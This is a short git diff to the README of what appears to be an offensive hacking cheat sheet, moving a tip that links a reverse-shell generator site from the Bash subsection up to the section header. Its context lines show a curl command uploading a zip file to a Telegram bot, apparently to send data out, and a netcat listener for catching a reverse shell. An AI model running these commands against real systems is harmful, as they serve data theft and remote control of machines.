diff --git a/README.md b/README.md index ae97f9d..602a035 100644 --- a/README.md +++ b/README.md @@ -1491,6 +1491,9 @@ curl -sF document=@file.zip "https://api.telegram.org/bot/sendDocu --- ## 5. Reverse Shell / Dumb Shell + +Tip: Use [https://www.revshells.com/](https://www.revshells.com/) 👌 + **5.i.a. Reverse shell with gs-netcat (encrypted)** @@ -1499,8 +1502,6 @@ See [6. Backdoors](#backdoor) for a 1-liner to deploy and access a fully functio **5.i.b. Reverse shell with Bash** -Tip: Use [https://www.revshells.com/](https://www.revshells.com/) 👌 - Start netcat to listen on port 1524 on your system: ```sh nc -nvlp 1524